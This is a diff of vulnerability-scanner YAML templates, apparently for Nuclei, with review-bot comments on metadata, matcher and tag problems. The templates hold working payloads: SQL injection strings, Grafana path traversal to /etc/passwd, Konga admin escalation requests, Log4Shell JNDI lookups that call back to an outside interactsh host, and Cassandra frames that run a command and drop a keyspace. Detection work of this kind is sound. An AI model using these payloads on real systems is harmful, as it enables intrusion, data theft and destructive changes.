HTTP/1.1 
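Review bot: Removing the `interactsh_request` matcher leaves only `part: interactsh_protocol` with `http`, so any HTTP callback to the interaction URL counts as a hit and nothing ties it to this scan's own request. The previous version correlated the callback through the random `useragent` variable; I would keep that matcher together with the `variables:` block removed in the first hunk of this file, so a result stays attributable. The raw request this matcher belongs to starts outside the hunk.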
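Review bot: The third `reference` entry of CVE-2021-41691.yaml ends in `name=CVE-2021-4169`, one digit short of this template's `cve-id`, so it points at a different record; it should read `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691`. The new side also leaves `classification` with only `cve-id`, so the `high` severity is stated without a vector or weakness class behind it. Adding `cwe-id: CWE-89` would match the SQL injection the description names.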
@@ -34,14 +26,15 @@ http: Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 - + student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 attack: pitchfork payloads: username: - student password: - student@123 + req-condition: true + cookie-reuse: true matchers: - type: dsl dsl: @@ -49,4 +42,4 @@ http: - 'status_code_2 == 200' condition: and -# digest: 4b0a00483046022100d69a704ad325691722917a459e5254a92c6c17b1de1bf9f45e49b81414445ce5022100f9ddad6028eb7b1ad78e82fc59de1d3a40a132b8da744cbf8057af607d694558:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/28 diff --git a/poc/cve/CVE-2021-4191.yaml b/poc/cve/CVE-2021-4191.yaml index 5d0ec2ff51..0a8ad4cbb9 100644 --- a/poc/cve/CVE-2021-4191.yaml +++ b/poc/cve/CVE-2021-4191.yaml 
@@ -1,33 +1,20 @@ id: CVE-2021-4191 - info: name: GitLab GraphQL API User Enumeration author: zsusac severity: medium description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses. - remediation: | - Implement rate limiting or CAPTCHA on the GraphQL API to prevent user enumeration. reference: - https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/ - https://thehackernews.com/2022/03/new-security-vulnerability-affects.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191 - - https://gitlab.com/gitlab-org/gitlab/-/issues/343898 - - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-4191.json classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-4191 - cwe-id: CWE-287 - epss-score: 0.16707 - epss-percentile: 0.95503 - cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - metadata: - max-request: 1 - vendor: gitlab - product: gitlab + cwe-id: CWE-359 tags: cve,cve2021,gitlab,api,graphql,enum,unauth - -http: +requests: - raw: - | POST /api/graphql HTTP/1.1 
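Review bot: The new `cvss-metrics` value starts with `CVSS:5.3/`, which puts the score where the version belongs and is not a valid vector; it should stay `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`. The `reference` entry `cvename.cgi?name=2021-4191` is also missing the `CVE-` prefix, so that lookup link will not resolve to this record.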
@@ -38,7 +25,6 @@ http: Referer: {{RootURL}}/-/graphql-explorer {"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":null,"operationName":null} - matchers-condition: and matchers: - type: word @@ -50,13 +36,12 @@ http: - '"id"' - 'gid://' condition: and - - type: status status: - 200 - extractors: - type: json json: - '.data.users.nodes[].username' -# digest: 490a00463044022072bf9b1ffd624ed45fd2cb9b4250a5336e3dccb702828e225891dcfea3aa89fc02205e75d4129bb0a9386d11ff164255aaef20eb406b50416b2cfd7c84542c7d4733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/07 diff --git a/poc/cve/CVE-2021-42258.yaml b/poc/cve/CVE-2021-42258.yaml index 002bc2d9e0..173f4fac22 100644 --- a/poc/cve/CVE-2021-42258.yaml +++ b/poc/cve/CVE-2021-42258.yaml 
@@ -1,30 +1,19 @@ id: CVE-2021-42258 - info: name: BillQuick Web Suite SQL Injection author: dwisiswant0 severity: critical + tags: cve,cve2021,sqli,billquick description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell. - remediation: | - Apply the latest security patches and updates provided by the vendor to fix the SQL Injection vulnerability in the BillQuick Web Suite. reference: - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware - https://nvd.nist.gov/vuln/detail/CVE-2021-42258 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-42258 cwe-id: CWE-89 - epss-score: 0.97301 - epss-percentile: 0.99844 - cpe: cpe:2.3:a:bqe:billquick_web_suite:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: bqe - product: billquick_web_suite - tags: cve,cve2021,sqli,billquick,kev - -http: +requests: - raw: - | GET / HTTP/1.1 
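Review bot: The `tags` line on the new side loses `kev`, and `epss-score`/`epss-percentile` are removed with it, so the template no longer carries the exploited-in-the-wild signal that triage tooling can key on. The first reference in this same hunk describes active exploitation, so I would keep `tags: cve,cve2021,sqli,billquick,kev` even if the rest of the older layout is intended.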
@@ -36,36 +25,34 @@ http: Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded - __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("{{VS}}")}}&__VIEWSTATEGENERATOR={{url_encode("{{VSG}}")}}&__EVENTVALIDATION={{url_encode("{{EV}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 - - matchers: - - type: word - part: body - words: - - "System.Data.SqlClient.SqlException" - - "Incorrect syntax near" - - "_ACCOUNTLOCKED" - condition: and - + __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 + cookie-reuse: true extractors: - type: xpath name: VS internal: true + attribute: value xpath: - "/html/body/form/div/input[@id='__VIEWSTATE']" - attribute: value - - type: xpath name: VSG internal: true + attribute: value xpath: - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']" - attribute: value - - type: xpath name: EV internal: true + attribute: value xpath: - "/html/body/form/div/input[@id='__EVENTVALIDATION']" - attribute: value -# digest: 4b0a00483046022100d73e9c6cb59f6c01ab6d1d75d8415d035879849d63fc47d7d062a2c3fc53749f022100c3614ce46923c20a9dc2b916da6bbcc15ac080e82245dec9d6d23955802ca201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + matchers: + - type: word + part: body + condition: and + words: + - "System.Data.SqlClient.SqlException" + - "Incorrect syntax near" + - "_ACCOUNTLOCKED" + +# Enhanced by mp on 2022/02/27 diff --git a/poc/cve/CVE-2021-43798.yaml b/poc/cve/CVE-2021-43798.yaml index 1349e5fd93..cae1edc347 100644 --- a/poc/cve/CVE-2021-43798.yaml +++ b/poc/cve/CVE-2021-43798.yaml 
@@ -1,32 +1,57 @@ id: CVE-2021-43798 info: - name: Grafana v8.x Arbitrary File Read - author: z0ne,dhiyaneshDk + name: Grafana v8.x - Arbitrary File Read + author: z0ne,dhiyaneshDk,j4vaovo severity: high - description: Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is `/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline. + description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin. + remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. 
reference: - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p - https://nosec.org/home/detail/4914.html - https://github.com/jas502n/Grafana-VulnTips - tags: cve,cve2021,grafana,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2021-43798 + - http://packetstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-43798 + cwe-id: CWE-22 + epss-score: 0.9724 + epss-percentile: 0.99802 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + metadata: + verified: "true" + max-request: 3 + vendor: grafana + product: grafana + shodan-query: title:"Grafana" + tags: packetstorm,cve,cve2021,grafana,lfi -requests: +http: - method: GET path: - - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd" + - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini' + - '{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini' + + stop-at-first-match: true matchers-condition: and matchers: + - type: word + part: header + words: + - "text/plain" - type: regex regex: - - "root:.*:0:0" + - 'root:.*:0:([0-9]+):' + - '\/tmp\/grafana\.sock' + - '\[(fonts|extensions|Mail|files)\]' + condition: or - type: status status: - - 200 \ No newline at end of file + - 200 +# digest: 4a0a0047304502206658644f5e107854cf02bdbae1ce75a6c00762f62f671f84aa65148f37a48dc4022100c299a04bb0aad97febb71fd43b897b82d4fce500d6823b2e1c686ff95be60e9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-44103.yaml b/poc/cve/CVE-2021-44103.yaml index 2cbaa2250d..915e1a03cc 100644 --- a/poc/cve/CVE-2021-44103.yaml +++ b/poc/cve/CVE-2021-44103.yaml 
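Review bot: The three regex alternatives are joined with `condition: or`, but nothing says which of the three request paths each one belongs to, which makes the matcher hard to audit. I would add a trailing comment on each regex line, e.g. `# /etc/passwd`, `# conf/defaults.ini`, `# windows/win.ini`. Note also that `root:.*:0:([0-9]+):` now accepts any numeric GID where the old pattern required `0`; that looks intentional but deserves a word in the comment.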
@@ -1,5 +1,4 @@ id: CVE-2021-44103 - info: name: KOGA 0.14.9 - Privilege Escalation author: rschio @@ -10,12 +9,10 @@ info: - https://www.exploit-db.com/exploits/50521 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44103 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.7 cve-id: CVE-2021-44103 - cwe-id: CWE-269 + cwe-id: CWE-264 tags: cve,cve2021,konga,authenticated - requests: - raw: - | @@ -24,7 +21,6 @@ requests: Content-Type: application/json {"password": "{{password}}", "identifier": "{{username}}"} - - | POST /api/user/{{id}} HTTP/1.1 Host: {{Hostname}} @@ -33,7 +29,6 @@ requests: Content-Type: application/json;charset=utf-8 {"token": "{{token}}"} - - | PUT /api/user/{{id}} HTTP/1.1 Host: {{Hostname}} @@ -42,7 +37,6 @@ requests: Content-Type: application/json;charset=utf-8 {"admin": "true", "passports": {"password": "{{password}}", "protocol": "local"}, "token": "{{token}}", "password_confirmation": "{{password}}"} - req-condition: true matchers-condition: and matchers: @@ -51,16 +45,13 @@ requests: - 'contains(body_2, "\"admin\":false")' - 'contains(body_3, "\"admin\":true")' condition: and - - type: word part: header words: - "application/json" - - type: status status: - 200 - extractors: - type: regex part: body @@ -69,7 +60,6 @@ requests: group: 1 regex: - '"id":([0-9]+)' - - type: regex part: body name: token diff --git a/poc/cve/CVE-2021-44228.yaml b/poc/cve/CVE-2021-44228.yaml index 902ff5ae82..affb8ee9a5 100644 --- a/poc/cve/CVE-2021-44228.yaml +++ b/poc/cve/CVE-2021-44228.yaml 
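Review bot: In the classification hunk of CVE-2021-44103.yaml, `cvss-metrics` is removed while `cvss-score` changes to `8.7`, leaving a score with no vector to check it against, and `cwe-id` moves to `CWE-264`, which is a CWE category rather than a specific weakness. I would keep `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` with `cvss-score: 8.8` and `cwe-id: CWE-269`. Separately, `name` says `KOGA` while the tags say `konga`; one of the two is a typo.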
@@ -1,90 +1,48 @@ id: CVE-2021-44228 info: - name: Apache Log4j2 Remote Code Injection - author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo + name: Remote code injection in Log4j + author: melbadry9,dhiyaneshDK,daffainfo severity: critical - description: | - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. - remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). + description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. 
reference: - - https://logging.apache.org/log4j/2.x/security.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q - https://www.lunasec.io/docs/blog/log4j-zero-day/ - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2021-44228 - cwe-id: CWE-20,CWE-917 - epss-score: 0.97453 - epss-percentile: 0.99942 - cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: apache - product: log4j - tags: cve,cve2021,rce,oast,log4j,injection,kev -variables: - rand1: '{{rand_int(111, 999)}}' - rand2: '{{rand_int(111, 999)}}' + tags: cve,cve2021,rce,oast,log4j -http: +requests: - raw: - - | - GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1 - Host: {{Hostname}} - | GET / HTTP/1.1 Host: {{Hostname}} - Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}} - Accept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}} - Accept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}} - Access-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}} - Access-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}} - Authentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}} - Authentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}} - Cookie: 
${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}} - Location: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}} - Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}} - Referer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}} - Upgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}} - User-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}} - X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}} - X-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}} - X-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}} - X-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}} - X-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}} + Referer: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{interactsh-url}}/poc} + X-Forwarded-For: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{interactsh-url}}/poc} + Authentication: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{interactsh-url}}/poc} + User-Agent: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{interactsh-url}}/poc} + X-Api-Version: ${${lower:n}${lower:d}i:${lower:rmi}://${hostName}.{{interactsh-url}}/poc} + + + + + - stop-at-first-match: true matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + - 
'([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable extractors: - - type: kval - kval: - - - type: regex - group: 2 - regex: - - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' part: interactsh_request - - - type: regex group: 1 regex: - - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' - part: interactsh_request -# digest: 4a0a0047304502202884fb76d02d44ae24b3e9bc5914a20e89726f929f3a1472cb9ce81e16f6c7320221009fb4e79fd5e58f4a49ccbeff467c990c3be6e32a7e03a2af8db207849e937d5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/cve/CVE-2021-44451.yaml b/poc/cve/CVE-2021-44451.yaml index 71a197e9fd..a67a59b2bd 100644 --- a/poc/cve/CVE-2021-44451.yaml +++ b/poc/cve/CVE-2021-44451.yaml 
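Review bot: The `interactsh_request` regex on the new side no longer requires the six-digit prefix built from `rand1`/`rand2`, so a DNS interaction can no longer be tied to this scan's own request, and `classification`, `remediation` and the `kev` tag are all removed for a critical finding. I would keep the `variables:` block with the `\d{6}\.`-anchored regex, and at minimum restore `remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).` The five empty added lines after the header list also look like sync residue.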
@@ -1,59 +1,72 @@ id: CVE-2021-44451 + info: - name: Apache Superset Default Login + name: Apache Superset <=1.3.2 - Default Login author: dhiyaneshDK - severity: high - description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. - remediation: Users should upgrade to Apache Superset 1.4.0 or higher. + severity: medium + description: | + Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Upgrade to Apache Superset 1.4.0 or higher. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json + - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 - tags: apache, default-login classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 cve-id: CVE-2021-44451 -requests: + cwe-id: CWE-522 + epss-score: 0.00614 + epss-percentile: 0.76336 + cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: apache + product: superset + shodan-query: http.favicon.hash:1582430156 + tags: cve,cve2021,apache,superset,default-login + +http: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} - | POST /login/ HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login csrf_token={{csrf_token}}&username={{username}}&password={{password}} - attack: pitchfork + - | + GET /dashboard/list/ HTTP/1.1 + Host: {{Hostname}} + payloads: username: - admin password: - admin - extractors: - - type: regex - name: csrf_token - 
group: 1 - part: body - internal: true - regex: - - 'value="(.*?)">' + attack: pitchfork + matchers-condition: and matchers: - type: word - part: body - condition: and + part: header_2 words: - - 'Redirecting...' - - '

Redirecting...' + - 'session' + - type: word - part: header + part: body_3 words: - - 'session' - - type: status - status: - - 302 + - 'DashboardFilterStateRestApi' -# Enhanced by mp on 2022/03/02 + extractors: + - type: regex + name: csrf_token + group: 1 + regex: + - 'name="csrf_token" type="hidden" value="(.*)"' + internal: true + part: body +# digest: 490a00463044022041de0dd6aa6d8640458b0bdc6402f1970f9cbc7b809bea89a3d19d33eefe722a02207c73590cdccce0af2ef7a36878ff85aeb663308dfcf4bdf2b9296acd541daec7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-44521.yaml b/poc/cve/CVE-2021-44521.yaml index 6b91463e9f..137b1ff0a7 100644 --- a/poc/cve/CVE-2021-44521.yaml +++ b/poc/cve/CVE-2021-44521.yaml @@ -1,4 +1,5 @@ id: CVE-2021-44521 + info: name: Apache Cassandra Load UDF RCE author: Y4er 
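Review bot: The relocated `csrf_token` extractor now uses a greedy capture, `value="(.*)"`, where the removed one used `(.*?)`. If the login form has any further quoted attribute after `value` on the same line, the capture runs to the last `"` and the POST carries a wrong token, so the default-credential check fails silently and the instance is reported clean. I would bound the capture: `- 'name="csrf_token" type="hidden" value="([^"]+)"'`. Separately, the `name` now reads "Default Login" while the description removed in this hunk spoke of a database-connection password leak, so it is worth confirming that the admin/admin check belongs under this CVE id.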
@@ -9,48 +10,65 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-44521 - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/ - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356 + - http://www.openwall.com/lists/oss-security/2022/02/11/4 + - https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/ + remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.1 cve-id: CVE-2021-44521 - cwe-id: CWE-94 + cwe-id: CWE-732,CWE-94 + cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:* + epss-score: 0.01212 + metadata: + max-request: 1 + product: cassandra + vendor: apache tags: cve,cve2021,network,rce,apache,cassandra -network: - - inputs: +tcp: + - host: + - "{{Hostname}}" + port: 9042 + + inputs: - data: "050000000500000000" - read: 1024 type: hex - - data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35" read: 1024 + + - data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35" type: hex - - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a" read: 1024 + + - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a" type: hex - - data: 
"7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b" read: 1024 + + - data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b" type: hex - - data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510" read: 1024 + + - data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510" type: hex - - data: "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" read: 1024 + + - data: "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" type: hex - - data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e" read: 1024 + + - data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e" type: hex - - data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281" read: 1024 + + - data: 
"450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281" type: hex + read: 1024 + - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a" type: hex read: 1024 - host: - - "{{Hostname}}" - - "{{Host}}:9042" matchers: - type: word part: raw words: - "123123" - -# Enhanced by mp on 2022/03/07 +# digest: 4a0a00473045022066ac296d5d1fd004ace89e39ecb2657d792ef93945cff6e3adeaca82d9b39faf022100b0320b6067d4643eea86c70dddfa01b432652dc53809a81204f7795cfbfa303c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-44528.yaml b/poc/cve/CVE-2021-44528.yaml index 52aea3dc60..6e9083cf52 100644 --- a/poc/cve/CVE-2021-44528.yaml +++ b/poc/cve/CVE-2021-44528.yaml 
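Review bot: The `tags` line stays `cve,cve2021,network,rce,apache,cassandra` although the inputs change state on the target. The hex frames decode to `drop KEYSPACE IF EXISTS test;`, `CREATE KEYSPACE test ...` and `CREATE TABLE test.rce ...`, so a scan deletes any existing keyspace that happens to be named `test`. CVE-2021-45428 in this same commit carries `intrusive`, which lets operators keep such templates out of production scans; I would add it here: `tags: cve,cve2021,network,intrusive,rce,apache,cassandra`. A short comment above `inputs:` saying that the run creates and drops keyspace `test` would also help whoever reviews the scan scope.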
@@ -1,35 +1,49 @@ id: CVE-2021-44528 + info: name: Open Redirect in Host Authorization Middleware author: geeknik severity: medium description: Specially crafted "X-Forwarded-Host" headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the Open Redirect vulnerability in the Host Authorization Middleware. reference: - https://seclists.org/oss-sec/2021/q4/att-160/7-0-host-authorzation-open-redirect.patch - https://nvd.nist.gov/vuln/detail/CVE-2021-44528 + - https://github.com/rails/rails/commit/0fccfb9a3097a9c4260c791f1a40b128517e7815 + - https://www.debian.org/security/2023/dsa-5372 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-44528 cwe-id: CWE-601 - tags: cve,cve2021,redirect -requests: + epss-score: 0.00087 + epss-percentile: 0.3627 + cpe: cpe:2.3:a:rubyonrails:rails:6.0.4.2:*:*:*:*:*:*:* 